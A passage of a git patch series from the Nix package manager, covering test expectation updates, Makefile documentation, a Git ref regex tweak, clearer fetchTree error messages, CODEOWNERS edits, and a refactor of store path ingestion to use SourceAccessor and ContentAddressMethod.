b/tests/functional/lang/parse-fail-undef-var-2.err.exp index 77c96bbd2..a58d8dca4 100644 --- a/tests/functional/lang/parse-fail-undef-var-2.err.exp +++ b/tests/functional/lang/parse-fail-undef-var-2.err.exp @@ -1,7 +1,5 @@ error: syntax error, unexpected ':', expecting '}' - at «stdin»:3:13: - 2| 3| f = {x, y : | ^ diff --git a/tests/functional/lang/parse-fail-undef-var.err.exp b/tests/functional/lang/parse-fail-undef-var.err.exp index 48e88747f..3d143d9af 100644 --- a/tests/functional/lang/parse-fail-undef-var.err.exp +++ b/tests/functional/lang/parse-fail-undef-var.err.exp @@ -1,7 +1,5 @@ error: undefined variable 'y' - at «stdin»:1:4: - 1| x: y | ^ 2| diff --git a/tests/functional/lang/parse-fail-utf8.err.exp b/tests/functional/lang/parse-fail-utf8.err.exp index 6087479a3..e83abdb9e 100644 --- a/tests/functional/lang/parse-fail-utf8.err.exp +++ b/tests/functional/lang/parse-fail-utf8.err.exp @@ -1,6 +1,4 @@ error: syntax error, unexpected invalid token, expecting end of file - at «stdin»:1:5: - 1| 123 | ^ From 7f5ed330e40d0aa2a2f907b2d4157329ff953cd2 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 16 Dec 2023 07:05:31 -0500 Subject: [PATCH 129/654] Document `Makefile` variables in `hacking.md` (#9620) --- doc/manual/src/contributing/hacking.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 4d3d66397..421ac981c 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -64,6 +64,15 @@ $ nix build You can also build Nix for one of the [supported platforms](#platforms). +## Makefile variables + +- `ENABLE_BUILD=yes` to enable building the C++ code. +- `ENABLE_TESTS=yes` to enable building the tests. +- `OPTIMIZE=1` to enable optimizations. +- `doc_generate=yes` to enable building the documentation (manual, man pages, etc.). + + The docs can take a while to build, so you may want to disable this for local development. + ## Building Nix To build all dependencies and start a shell in which all environment variables are set up so that those dependencies can be found: From c05d4fadd5f0943de0a00b17c85626d73152da66 Mon Sep 17 00:00:00 2001 From: David Arnold Date: Sat, 16 Dec 2023 23:07:17 +0100 Subject: [PATCH 130/654] fix: valid branch name --- src/libutil/url-parts.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libutil/url-parts.hh b/src/libutil/url-parts.hh index 07bc8d0cd..e968eea4b 100644 --- a/src/libutil/url-parts.hh +++ b/src/libutil/url-parts.hh @@ -25,7 +25,7 @@ const static std::string pathRegex = "(?:" + segmentRegex + "(?:/" + segmentRege /// A Git ref (i.e. branch or tag name). /// \todo check that this is correct. -const static std::string refRegexS = "[a-zA-Z0-9@][a-zA-Z0-9_.\\/@-]*"; +const static std::string refRegexS = "[a-zA-Z0-9@][a-zA-Z0-9_.\\/@-+]*"; extern std::regex refRegex; /// Instead of defining what a good Git Ref is, we define what a bad Git Ref is From 06bed2eacdeaa3b92d6e35c5d2133c31baa9e56f Mon Sep 17 00:00:00 2001 From: Julia Evans Date: Sun, 17 Dec 2023 12:00:50 -0500 Subject: [PATCH 131/654] Make fetchTree locked input error message clearer --- src/libexpr/primops/fetchTree.cc | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index eb2df8626..fa503665e 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -167,7 +167,10 @@ static void fetchTree( input = lookupInRegistries(state.store, input).first; if (evalSettings.pureEval && !input.isLocked()) - state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchTree' requires a locked input, at %s", state.positions[pos])); + if (type == "git") + state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchGit' requires a locked input, at %s", state.positions[pos])); + else + state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchTree' requires a locked input, at %s", state.positions[pos])); state.checkURI(input.toURLString()); From a47fabff0dbcd63e2645db7336dde5865a1995c4 Mon Sep 17 00:00:00 2001 From: Julia Evans Date: Sun, 17 Dec 2023 12:14:55 -0500 Subject: [PATCH 132/654] use params.isFetchGit instead to check if it came from fetchGit --- src/libexpr/primops/fetchTree.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index fa503665e..505900b30 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -167,7 +167,7 @@ static void fetchTree( input = lookupInRegistries(state.store, input).first; if (evalSettings.pureEval && !input.isLocked()) - if (type == "git") + if (params.isFetchGit) state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchGit' requires a locked input, at %s", state.positions[pos])); else state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchTree' requires a locked input, at %s", state.positions[pos])); From 4f9580085441a4255ce746a4cc498b45cc25a899 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Mon, 18 Dec 2023 11:41:52 +0100 Subject: [PATCH 133/654] add cross-reference --- src/libstore/globals.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index e28615cdc..b35dc37a1 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -631,7 +631,7 @@ public: At least one of the following condition must be met for Nix to accept copying a store object from another - Nix store (such as a substituter): + Nix store (such as a [substituter](#conf-substituters)): - the store object has been signed using a key in the trusted keys list - the [`require-sigs`](#conf-require-sigs) option has been set to `false` From d19a6675286a38edf8970459cbf454322f8151cb Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Mon, 18 Dec 2023 13:54:40 +0100 Subject: [PATCH 134/654] CODEOWNERS: unsubscribe fricklerhandwerk (#9614) --- .github/CODEOWNERS | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 39d595199..526fecabf 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -10,16 +10,8 @@ # This file .github/CODEOWNERS @edolstra -# Public documentation -/doc @fricklerhandwerk -*.md @fricklerhandwerk - # Documentation of built-in functions -src/libexpr/primops.cc @fricklerhandwerk @roberth -# Documentation on experimental features -src/libutil/experimental-features.cc @fricklerhandwerk -# Documentation on configuration settings -src/libstore/globals.hh @fricklerhandwerk +src/libexpr/primops.cc @roberth # Libstore layer /src/libstore @thufschmitt From dfc876531f269950a4e183a4f77a813c421d7d64 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 4 Nov 2023 16:25:41 -0400 Subject: [PATCH 135/654] Organize content addressing, use `SourceAccessor` with `Store::addToStore` Co-authored-by: Robert Hensing --- perl/lib/Nix/Store.xs | 12 ++- src/libcmd/installable-value.cc | 2 +- src/libexpr/eval.cc | 2 +- src/libexpr/primops.cc | 2 +- src/libfetchers/cache.cc | 16 ++-- src/libfetchers/cache.hh | 6 +- src/libfetchers/fetchers.cc | 2 +- src/libfetchers/git.cc | 4 +- src/libfetchers/github.cc | 4 +- src/libfetchers/input-accessor.cc | 39 ++++++--- src/libfetchers/input-accessor.hh | 8 +- src/libfetchers/mercurial.cc | 25 ++++-- src/libfetchers/tarball.cc | 14 +-- src/libstore/binary-cache-store.cc | 56 ++++++------ src/libstore/binary-cache-store.hh | 24 ++++-- src/libstore/build/local-derivation-goal.cc | 90 +++++++++---------- src/libstore/build/worker.cc | 4 +- src/libstore/content-address.cc | 28 ++++-- src/libstore/content-address.hh | 38 ++++----- src/libstore/daemon.cc | 19 +---- src/libstore/legacy-ssh-store.hh | 15 ++-- src/libstore/local-store.cc | 95 ++++++++------------- src/libstore/local-store.hh | 22 ++--- src/libstore/optimise-store.cc | 15 +++- src/libstore/remote-store.cc | 9 +- src/libstore/remote-store.hh | 11 ++- src/libstore/store-api.cc | 90 ++++++++++--------- src/libstore/store-api.hh | 36 +++++--- src/libstore/store-dir-config.hh | 14 +-- src/libutil/file-content-address.cc | 49 +++++++++++ src/libutil/file-content-address.hh | 56 ++++++++++++ src/libutil/hash.cc | 9 -- src/libutil/hash.hh | 7 +- src/nix-store/nix-store.cc | 20 ++++- src/nix/add-to-store.cc | 42 +++------ src/nix/hash.cc | 11 +-- src/nix/prefetch.cc | 7 +- tests/unit/libexpr/primops.cc | 2 +- 38 files changed, 515 insertions(+), 390 deletions(-) create mode 100644 src/libutil/file-content-address.cc create mode 100644 src/libutil/file-content-address.hh diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs index 82c7db608..4964b8a34 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -13,6 +13,7 @@ #include "globals.hh" #include "store-api.hh" #include "crypto.hh" +#include "posix-source-accessor.hh" #include #include @@ -205,7 +206,10 @@ void importPaths(int fd, int dontCheckSigs) SV * hashPath(char * algo, int base32, char * path) PPCODE: try { - Hash h = hashPath(parseHashAlgo(algo), path).first; + PosixSourceAccessor accessor; + Hash h = hashPath( + accessor, CanonPath::fromCwd(path), + FileIngestionMethod::Recursive, parseHashAlgo(algo)).first; auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { @@ -281,7 +285,11 @@ SV * addToStore(char * srcPath, int recursive, char * algo) PPCODE: try { auto method = recursive ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; - auto path = store()->addToStore(std::string(baseNameOf(srcPath)), srcPath, method, parseHashAlgo(algo)); + PosixSourceAccessor accessor; + auto path = store()->addToStore( + std::string(baseNameOf(srcPath)), + accessor, CanonPath::fromCwd(srcPath), + method, parseHashAlgo(algo)); XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(path).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); diff --git a/src/libcmd/installable-value.cc b/src/libcmd/installable-value.cc index 08ad35105..bdc34bbe3 100644 --- a/src/libcmd/installable-value.cc +++ b/src/libcmd/installable-value.cc @@ -44,7 +44,7 @@ ref InstallableValue::require(ref installable) std::optional InstallableValue::trySinglePathToDerivedPaths(Value & v, const PosIdx pos, std::string_view errorCtx) { if (v.type() == nPath) { - auto storePath = v.path().fetchToStore(state->store); + auto storePath = v.path().fetchToStore(*state->store); return {{ .path = DerivedPath::Opaque { .path = std::move(storePath), diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 1552e3e92..c9c25c898 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2317,7 +2317,7 @@ StorePath EvalState::copyPathToStore(NixStringContext & context, const SourcePat auto dstPath = i != srcToStore.end() ? i->second : [&]() { - auto dstPath = path.fetchToStore(store, path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); + auto dstPath = path.fetchToStore(*store, path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); allowPath(dstPath); srcToStore.insert_or_assign(path, dstPath); printMsg(lvlChatty, "copied source '%1%' -> '%2%'", path, store->printStorePath(dstPath)); diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index d78a28c73..75ee1e38d 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -2229,7 +2229,7 @@ static void addPath( }); if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) { - auto dstPath = path.fetchToStore(state.store, name, method, filter.get(), state.repair); + auto dstPath = path.fetchToStore(*state.store, name, method, filter.get(), state.repair); if (expectedHash && expectedStorePath != dstPath) state.debugThrowLastTrace(Error("store path mismatch in (possibly filtered) path added from '%s'", path)); state.allowAndSetStorePathString(dstPath, v); diff --git a/src/libfetchers/cache.cc b/src/libfetchers/cache.cc index 63b05bdab..e071b4717 100644 --- a/src/libfetchers/cache.cc +++ b/src/libfetchers/cache.cc @@ -106,7 +106,7 @@ struct CacheImpl : Cache } void add( - ref store, + Store & store, const Attrs & inAttrs, const Attrs & infoAttrs, const StorePath & storePath, @@ -115,13 +115,13 @@ struct CacheImpl : Cache _state.lock()->add.use() (attrsToJSON(inAttrs).dump()) (attrsToJSON(infoAttrs).dump()) - (store->printStorePath(storePath)) + (store.printStorePath(storePath)) (locked) (time(0)).exec(); } std::optional> lookup( - ref store, + Store & store, const Attrs & inAttrs) override { if (auto res = lookupExpired(store, inAttrs)) { @@ -134,7 +134,7 @@ struct CacheImpl : Cache } std::optional lookupExpired( - ref store, + Store & store, const Attrs & inAttrs) override { auto state(_state.lock()); @@ -148,19 +148,19 @@ struct CacheImpl : Cache } auto infoJSON = stmt.getStr(0); - auto storePath = store->parseStorePath(stmt.getStr(1)); + auto storePath = store.parseStorePath(stmt.getStr(1)); auto locked = stmt.getInt(2) != 0; auto timestamp = stmt.getInt(3); - store->addTempRoot(storePath); - if (!store->isValidPath(storePath)) { + store.addTempRoot(storePath); + if (!store.isValidPath(storePath)) { // FIXME: we could try to substitute 'storePath'. debug("ignoring disappeared cache entry '%s'", inAttrsJSON); return {}; } debug("using cache entry '%s' -> '%s', '%s'", - inAttrsJSON, infoJSON, store->printStorePath(storePath)); + inAttrsJSON, infoJSON, store.printStorePath(storePath)); return Result { .expired = !locked && (settings.tarballTtl.get() == 0 || timestamp + settings.tarballTtl < time(0)), diff --git a/src/libfetchers/cache.hh b/src/libfetchers/cache.hh index f70589267..791d77025 100644 --- a/src/libfetchers/cache.hh +++ b/src/libfetchers/cache.hh @@ -50,14 +50,14 @@ struct Cache /* Old cache for things that have a store path. */ virtual void add( - ref store, + Store & store, const Attrs & inAttrs, const Attrs & infoAttrs, const StorePath & storePath, bool locked) = 0; virtual std::optional> lookup( - ref store, + Store & store, const Attrs & inAttrs) = 0; struct Result @@ -68,7 +68,7 @@ struct Cache }; virtual std::optional lookupExpired( - ref store, + Store & store, const Attrs & inAttrs) = 0; }; diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc index 7ec1f9802..f309e5993 100644 --- a/src/libfetchers/fetchers.cc +++ b/src/libfetchers/fetchers.cc @@ -374,7 +374,7 @@ void InputScheme::clone(const Input & input, const Path & destDir) const std::pair InputScheme::fetch(ref store, const Input & input) { auto [accessor, input2] = getAccessor(store, input); - auto storePath = SourcePath(accessor).fetchToStore(store, input2.getName()); + auto storePath = SourcePath(accessor).fetchToStore(*store, input2.getName()); return {storePath, input2}; } diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 5dac66930..01cd28427 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -368,14 +368,14 @@ struct GitInputScheme : InputScheme RepoInfo getRepoInfo(const Input & input) const { - auto checkHashType = [&](const std::optional & hash) + auto checkHashAlgorithm = [&](const std::optional & hash) { if (hash.has_value() && !(hash->algo == HashAlgorithm::SHA1 || hash->algo == HashAlgorithm::SHA256)) throw Error("Hash '%s' is not supported by Git. Supported types are sha1 and sha256.", hash->to_string(HashFormat::Base16, true)); }; if (auto rev = input.getRev()) - checkHashType(rev); + checkHashAlgorithm(rev); RepoInfo repoInfo; diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc index 70acb9354..498e41357 100644 --- a/src/libfetchers/github.cc +++ b/src/libfetchers/github.cc @@ -201,7 +201,7 @@ struct GitArchiveInputScheme : InputScheme {"rev", rev->gitRev()}, }); - if (auto res = getCache()->lookup(store, lockedAttrs)) { + if (auto res = getCache()->lookup(*store, lockedAttrs)) { input.attrs.insert_or_assign("lastModified", getIntAttr(res->first, "lastModified")); return {std::move(res->second), input}; } @@ -213,7 +213,7 @@ struct GitArchiveInputScheme : InputScheme input.attrs.insert_or_assign("lastModified", uint64_t(result.lastModified)); getCache()->add( - store, + *store, lockedAttrs, { {"rev", rev->gitRev()}, diff --git a/src/libfetchers/input-accessor.cc b/src/libfetchers/input-accessor.cc index 1f793bf1d..a647f5915 100644 --- a/src/libfetchers/input-accessor.cc +++ b/src/libfetchers/input-accessor.cc @@ -5,10 +5,10 @@ namespace nix { StorePath InputAccessor::fetchToStore( - ref store, + Store & store, const CanonPath & path, std::string_view name, - FileIngestionMethod method, + ContentAddressMethod method, PathFilter * filter, RepairFlag repair) { @@ -20,10 +20,24 @@ StorePath InputAccessor::fetchToStore( if (!filter && fingerprint) { cacheKey = fetchers::Attrs{ {"_what", "fetchToStore"}, - {"store", store->storeDir}, + {"store", store.storeDir}, {"name", std::string(name)}, {"fingerprint", *fingerprint}, - {"method", (uint8_t) method}, + { + "method", + std::visit(overloaded { + [](const TextIngestionMethod &) { + return "text"; + }, + [](const FileIngestionMethod & fim) { + switch (fim) { + case FileIngestionMethod::Flat: return "flat"; + case FileIngestionMethod::Recursive: return "nar"; + default: assert(false); + } + }, + }, method.raw), + }, {"path", path.abs()} }; if (auto res = fetchers::getCache()->lookup(store, *cacheKey)) { @@ -35,17 +49,14 @@ StorePath InputAccessor::fetchToStore( Activity act(*logger, lvlChatty, actUnknown, fmt("copying '%s' to the store", showPath(path))); - auto source = sinkToSource([&](Sink & sink) { - if (method == FileIngestionMethod::Recursive) - dumpPath(path, sink, filter ? *filter : defaultPathFilter); - else - readFile(path, sink); - }); + auto filter2 = filter ? *filter : defaultPathFilter; auto storePath = settings.readOnlyMode - ? store->computeStorePathFromDump(*source, name, method, HashAlgorithm::SHA256).first - : store->addToStoreFromDump(*source, name, method, HashAlgorithm::SHA256, repair); + ? store.computeStorePath( + name, *this, path, method, HashAlgorithm::SHA256, {}, filter2).first + : store.addToStore( + name, *this, path, method, HashAlgorithm::SHA256, {}, filter2, repair); if (cacheKey) fetchers::getCache()->add(store, *cacheKey, {}, storePath, true); @@ -60,9 +71,9 @@ std::ostream & operator << (std::ostream & str, const SourcePath & path) } StorePath SourcePath::fetchToStore( - ref store, + Store & store, std::string_view name, - FileIngestionMethod method, + ContentAddressMethod method, PathFilter * filter, RepairFlag repair) const { diff --git a/src/libfetchers/input-accessor.hh b/src/libfetchers/input-accessor.hh index f385e6231..d2a21cb4b 100644 --- a/src/libfetchers/input-accessor.hh +++ b/src/libfetchers/input-accessor.hh @@ -30,10 +30,10 @@ struct InputAccessor : virtual SourceAccessor, std::enable_shared_from_this store, + Store & store, const CanonPath & path, std::string_view name = "source", - FileIngestionMethod method = FileIngestionMethod::Recursive, + ContentAddressMethod method = FileIngestionMethod::Recursive, PathFilter * filter = nullptr, RepairFlag repair = NoRepair); }; @@ -116,9 +116,9 @@ struct SourcePath * Copy this `SourcePath` to the Nix store. */ StorePath fetchToStore( - ref store, + Store & store, std::string_view name = "source", - FileIngestionMethod method = FileIngestionMethod::Recursive, + ContentAddressMethod method = FileIngestionMethod::Recursive, PathFilter * filter = nullptr, RepairFlag repair = NoRepair) const; diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc index 6056b9a3c..9982389ab 100644 --- a/src/libfetchers/mercurial.cc +++ b/src/libfetchers/mercurial.cc @@ -6,6 +6,7 @@ #include "tarfile.hh" #include "store-api.hh" #include "url-parts.hh" +#include "posix-source-accessor.hh" #include "fetch-settings.hh" @@ -210,7 +211,12 @@ struct MercurialInputScheme : InputScheme return files.count(file); }; - auto storePath = store->addToStore(input.getName(), actualPath, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, filter); + PosixSourceAccessor accessor; + auto storePath = store->addToStore( + input.getName(), + accessor, CanonPath { actualPath }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256, {}, + filter); return {std::move(storePath), input}; } @@ -218,7 +224,7 @@ struct MercurialInputScheme : InputScheme if (!input.getRef()) input.attrs.insert_or_assign("ref", "default"); - auto checkHashType = [&](const std::optional & hash) + auto checkHashAlgorithm = [&](const std::optional & hash) { if (hash.has_value() && hash->algo != HashAlgorithm::SHA1) throw Error("Hash '%s' is not supported by Mercurial. Only sha1 is supported.", hash->to_string(HashFormat::Base16, true)); @@ -227,7 +233,7 @@ struct MercurialInputScheme : InputScheme auto getLockedAttrs = [&]() { - checkHashType(input.getRev()); + checkHashAlgorithm(input.getRev()); return Attrs({ {"type", "hg"}, @@ -246,7 +252,7 @@ struct MercurialInputScheme : InputScheme }; if (input.getRev()) { - if (auto res = getCache()->lookup(store, getLockedAttrs())) + if (auto res = getCache()->lookup(*store, getLockedAttrs())) return makeResult(res->first, std::move(res->second)); } @@ -259,7 +265,7 @@ struct MercurialInputScheme : InputScheme {"ref", *input.getRef()}, }); - if (auto res = getCache()->lookup(store, unlockedAttrs)) { + if (auto res = getCache()->lookup(*store, unlockedAttrs)) { auto rev2 = Hash::parseAny(getStrAttr(res->first, "rev"), HashAlgorithm::SHA1); if (!input.getRev() || input.getRev() == rev2) { input.attrs.insert_or_assign("rev", rev2.gitRev()); @@ -305,7 +311,7 @@ struct MercurialInputScheme : InputScheme auto revCount = std::stoull(tokens[1]); input.attrs.insert_or_assign("ref", tokens[2]); - if (auto res = getCache()->lookup(store, getLockedAttrs())) + if (auto res = getCache()->lookup(*store, getLockedAttrs())) return makeResult(res->first, std::move(res->second)); Path tmpDir = createTempDir(); @@ -315,7 +321,8 @@ struct MercurialInputScheme : InputScheme deletePath(tmpDir + "/.hg_archival.txt"); - auto storePath = store->addToStore(name, tmpDir); + PosixSourceAccessor accessor; + auto storePath = store->addToStore(name, accessor, CanonPath { tmpDir }); Attrs infoAttrs({ {"rev", input.getRev()->gitRev()}, @@ -324,14 +331,14 @@ struct MercurialInputScheme : InputScheme if (!_input.getRev()) getCache()->add( - store, + *store, unlockedAttrs, infoAttrs, storePath, false); getCache()->add( - store, + *store, getLockedAttrs(), infoAttrs, storePath, diff --git a/src/libfetchers/tarball.cc b/src/libfetchers/tarball.cc index 086366180..3b7709440 100644 --- a/src/libfetchers/tarball.cc +++ b/src/libfetchers/tarball.cc @@ -8,6 +8,7 @@ #include "tarfile.hh" #include "types.hh" #include "split.hh" +#include "posix-source-accessor.hh" namespace nix::fetchers { @@ -26,7 +27,7 @@ DownloadFileResult downloadFile( {"name", name}, }); - auto cached = getCache()->lookupExpired(store, inAttrs); + auto cached = getCache()->lookupExpired(*store, inAttrs); auto useCached = [&]() -> DownloadFileResult { @@ -91,7 +92,7 @@ DownloadFileResult downloadFile( } getCache()->add( - store, + *store, inAttrs, infoAttrs, *storePath, @@ -99,7 +100,7 @@ DownloadFileResult downloadFile( if (url != res.effectiveUri) getCache()->add( - store, + *store, { {"type", "file"}, {"url", res.effectiveUri}, @@ -130,7 +131,7 @@ DownloadTarballResult downloadTarball( {"name", name}, }); - auto cached = getCache()->lookupExpired(store, inAttrs); + auto cached = getCache()->lookupExpired(*store, inAttrs); if (cached && !cached->expired) return { @@ -156,7 +157,8 @@ DownloadTarballResult downloadTarball( throw nix::Error("tarball '%s' contains an unexpected number of top-level files", url); auto topDir = tmpDir + "/" + members.begin()->name; lastModified = lstat(topDir).st_mtime; - unpackedStorePath = store->addToStore(name, topDir, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, defaultPathFilter, NoRepair); + PosixSourceAccessor accessor; + unpackedStorePath = store->addToStore(name, accessor, CanonPath { topDir }, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, {}, defaultPathFilter, NoRepair); } Attrs infoAttrs({ @@ -168,7 +170,7 @@ DownloadTarballResult downloadTarball( infoAttrs.emplace("immutableUrl", *res.immutableUrl); getCache()->add( - store, + *store, inAttrs, infoAttrs, *unpackedStorePath, diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index 2837e8934..19aa283fc 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -300,8 +300,13 @@ void BinaryCacheStore::addToStore(const ValidPathInfo & info, Source & narSource }}); } -StorePath BinaryCacheStore::addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) +StorePath BinaryCacheStore::addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) { if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) unsupported("addToStoreFromDump"); @@ -309,15 +314,14 @@ StorePath BinaryCacheStore::addToStoreFromDump(Source & dump, std::string_view n ValidPathInfo info { *this, name, - FixedOutputInfo { - .method = method, - .hash = nar.first, - .references = { + ContentAddressWithReferences::fromParts( + method, + nar.first, + { .others = references, // caller is not capable of creating a self-reference, because this is content-addressed without modulus .self = false, - }, - }, + }), nar.first, }; info.narSize = nar.second; @@ -399,42 +403,36 @@ void BinaryCacheStore::queryPathInfoUncached(const StorePath & storePath, } StorePath BinaryCacheStore::addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) + std::string_view name, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter, + RepairFlag repair) { /* FIXME: Make BinaryCacheStore::addToStoreCommon support non-recursive+sha256 so we can just use the default implementation of this method in terms of addToStoreFromDump. */ - HashSink sink { hashAlgo }; - if (method == FileIngestionMethod::Recursive) { - dumpPath(srcPath, sink, filter); - } else { - readFile(srcPath, sink); - } - auto h = sink.finish().first; + auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter).first; auto source = sinkToSource([&](Sink & sink) { - dumpPath(srcPath, sink, filter); + accessor.dumpPath(path, sink, filter); }); return addToStoreCommon(*source, repair, CheckSigs, [&](HashResult nar) { ValidPathInfo info { *this, name, - FixedOutputInfo { - .method = method, - .hash = h, - .references = { + ContentAddressWithReferences::fromParts( + method, + h, + { .others = references, // caller is not capable of creating a self-reference, because this is content-addressed without modulus .self = false, - }, - }, + }), nar.first, }; info.narSize = nar.second; diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh index 395e1b479..dbe4ac180 100644 --- a/src/libstore/binary-cache-store.hh +++ b/src/libstore/binary-cache-store.hh @@ -123,17 +123,23 @@ public: void addToStore(const ValidPathInfo & info, Source & narSource, RepairFlag repair, CheckSigsFlag checkSigs) override; - StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) override; + StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) override; StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override; + std::string_view name, + SourceAccessor & accessor, + const CanonPath & srcPath, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter, + RepairFlag repair) override; StorePath addTextToStore( std::string_view name, diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index 802b39f84..e4828dd2f 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -20,6 +20,7 @@ #include "child.hh" #include "unix-domain-socket.hh" #include "posix-fs-canonicalise.hh" +#include "posix-source-accessor.hh" #include #include @@ -1290,13 +1291,14 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In { throw Error("queryPathFromHashPart"); } StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override + std::string_view name, + SourceAccessor & accessor, + const CanonPath & srcPath, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter, + RepairFlag repair) override { throw Error("addToStore"); } void addToStore(const ValidPathInfo & info, Source & narSource, @@ -1318,14 +1320,14 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In } StorePath addToStoreFromDump( - Source & dump, - std::string_view name, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - RepairFlag repair, - const StorePathSet & references) override + Source & dump, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) override { - auto path = next->addToStoreFromDump(dump, name, method, hashAlgo, repair, references); + auto path = next->addToStoreFromDump(dump, name, method, hashAlgo, references, repair); goal.addDependency(path); return path; } @@ -2453,8 +2455,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() throw BuildError( "output path %1% without valid stats info", actualPath); - if (outputHash.method == ContentAddressMethod { FileIngestionMethod::Flat } || - outputHash.method == ContentAddressMethod { TextIngestionMethod {} }) + if (outputHash.method.getFileIngestionMethod() == FileIngestionMethod::Flat) { /* The output path should be a regular file without execute permission. */ if (!S_ISREG(st->st_mode) || (st->st_mode & S_IXUSR) != 0) @@ -2466,38 +2467,23 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() rewriteOutput(outputRewrites); /* FIXME optimize and deduplicate with addToStore */ std::string oldHashPart { scratchPath->hashPart() }; - HashModuloSink caSink {outputHash.hashAlgo, oldHashPart }; - std::visit(overloaded { - [&](const TextIngestionMethod &) { - readFile(actualPath, caSink); - }, - [&](const FileIngestionMethod & m2) { - switch (m2) { - case FileIngestionMethod::Recursive: - dumpPath(actualPath, caSink); - break; - case FileIngestionMethod::Flat: - readFile(actualPath, caSink); - break; - } - }, - }, outputHash.method.raw); - auto got = caSink.finish().first; + auto got = ({ + HashModuloSink caSink { outputHash.hashAlgo, oldHashPart }; + PosixSourceAccessor accessor; + dumpPath( + accessor, CanonPath { actualPath }, + caSink, + outputHash.method.getFileIngestionMethod()); + caSink.finish().first; + }); - auto optCA = 